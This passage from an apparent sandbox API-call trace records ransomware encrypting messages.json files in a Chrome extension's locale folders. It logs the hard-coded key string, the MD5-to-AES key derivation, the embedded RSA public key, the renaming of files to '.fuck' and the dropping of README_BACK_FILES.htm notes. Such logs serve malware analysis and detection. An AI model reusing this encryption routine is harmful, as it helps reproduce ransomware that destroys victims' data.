[0252.189] GetFileType (hFile=0x5d60) returned 0x1 [0252.189] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.190] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.190] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.190] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.190] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.191] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.191] GetLastError () returned 0x0 [0252.191] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json")) returned 0x20 [0252.191] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0252.191] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.192] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.193] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.194] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.196] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.196] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.196] CryptHashData (hHash=0x2984760, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.196] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984760, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.197] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.197] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.197] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c020) returned 1 [0252.197] CryptImportPublicKeyInfo (in: hCryptProv=0x298c020, dwCertEncodingType=0x1, pInfo=0x29940a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29940d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29940d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29849a0) returned 1 [0252.197] CryptEncrypt (in: hKey=0x29849a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.198] CryptEncrypt (in: hKey=0x29849a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c130*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c130*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.198] WriteFile (in: hFile=0x5d64, lpBuffer=0x298c130*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c130*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.199] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.201] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.201] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.201] CloseHandle (hObject=0x5d5c) returned 1 [0252.201] CloseHandle (hObject=0x5d64) returned 1 [0252.201] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0252.205] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0252.205] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0252.207] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0252.208] CryptDestroyHash (hHash=0x2984760) returned 1 [0252.208] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.208] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.208] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.208] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.209] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0252.209] AreFileApisANSI () returned 1 [0252.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.209] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.209] GetFileType (hFile=0x5d60) returned 0x1 [0252.209] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.210] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.210] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.211] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.211] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.211] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.211] GetLastError () returned 0x0 [0252.211] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json")) returned 0x20 [0252.212] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0252.212] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.214] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.216] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.216] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.219] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.219] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.219] CryptHashData (hHash=0x29846a0, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.219] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.219] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.219] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.219] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b608) returned 1 [0252.220] CryptImportPublicKeyInfo (in: hCryptProv=0x298b608, dwCertEncodingType=0x1, pInfo=0x2992ec0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992ef0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992ef8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984d20) returned 1 [0252.220] CryptEncrypt (in: hKey=0x2984d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.220] CryptEncrypt (in: hKey=0x2984d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298bc68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298bc68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.220] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298bc68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298bc68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.221] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x9f, lpOverlapped=0x0) returned 1 [0252.224] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x9f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xa0) returned 1 [0252.224] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xa0, lpOverlapped=0x0) returned 1 [0252.224] CloseHandle (hObject=0x5d64) returned 1 [0252.224] CloseHandle (hObject=0x5d5c) returned 1 [0252.225] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0252.230] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0252.230] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.gsg")) returned 1 [0252.232] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.fuck")) returned 1 [0252.233] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.233] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.233] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.233] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.233] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.234] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0252.234] AreFileApisANSI () returned 1 [0252.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.234] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.235] GetFileType (hFile=0x5d60) returned 0x1 [0252.235] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.236] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.236] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.237] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.237] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.237] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.237] GetLastError () returned 0x0 [0252.237] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json")) returned 0x20 [0252.237] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0252.238] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.238] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.239] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.239] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.242] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.242] lstrlenA 